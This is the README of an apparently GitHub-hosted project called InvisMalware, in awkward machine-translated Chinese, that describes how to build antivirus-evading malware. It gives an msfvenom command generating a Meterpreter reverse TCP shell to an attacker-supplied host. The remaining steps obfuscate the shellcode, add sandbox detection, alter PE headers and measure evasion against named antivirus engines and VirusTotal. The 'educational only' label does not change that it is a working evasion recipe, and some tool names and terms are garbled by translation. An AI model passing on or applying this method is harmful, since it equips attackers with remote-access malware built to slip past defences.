InvisMalware

1. 介紹
2. 特徵
3. 安裝
4. 用法
5. 實驗方法
6. 測試
7. 貢獻
8. 執照

Invismalware是一個旨在展示繞過防病毒檢測的先進惡意軟件逃避技術的項目。該研究驅動的惡意軟件實驗的重點是利用混淆方法，例如代碼修改和反對盒策略，以逃避靜態和動態的惡意軟件檢測。

該項目僅用於教育目的，旨在通過從惡意演員使用的逃避技術中學習來提供對現代惡意軟件防禦策略的見解。

• ShellCode生成：使用MSFVENOM創建自定義反向TCP Shell有效載荷。
• 代碼混淆：修改惡意軟件代碼，通過添加NOP，操縱PE標頭等來逃避防病毒檢測。
• 抗動力分析：包括檢測沙箱環境（例如音頻驅動程序和USB設備的存在）的檢查。
• PE標頭操縱：通過調整便攜式可執行文件（PE）標頭以避免基於簽名的檢測來掩蓋惡意軟件。
• 逃避率計算：通過比較各種防病毒發動機的結果來衡量逃避技術的有效性。

首先，請克隆存儲庫並安裝必要的依賴項。

• Python 3.x
• VirtualBox/VMware（用於在虛擬環境中測試）
• metasploit框架（用於生成殼牌）
• PE-BER （用於PE標題操作）

git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware

pip install -r requirements.txt

使用MSFVENOM生成反向TCP ShellCode：

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c

編輯evilexp.c文件以混淆代碼並避免檢測。

將惡意軟件部署在安全，孤立的虛擬機中，以測試其行為並測量檢測率。

將您的惡意軟件上傳到Virustotal，以評估其在多個防病毒引擎中的逃避率。

該項目遵循四階段的方法來實現惡意軟件：

1. ShellCode生成：創建基線反向外殼密碼。
2. 代碼修改：混淆殼碼以逃避檢測。
3. 反動態分析：將沙箱檢測添加到旁路動態分析工具中。
4. PE標頭修改：更改PE標頭以進一步混淆惡意軟件簽名。

在虛擬機上運行配備防病毒軟件的惡意軟件，例如Kaspersky ， Windows Defender或BitDefender 。

將修改後的惡意軟件上傳到Virustotal ，並檢查多少防病毒引擎成功檢測到它。

我們歡迎捐款改善項目。如果您想貢獻：

1. 分叉存儲庫。
2. 為您的功能或錯誤修復創建一個新的分支。
3. 提交拉動請求，其中包含有關您更改的詳細信息。

該項目已根據MIT許可獲得許可。有關詳細信息，請參見許可證文件。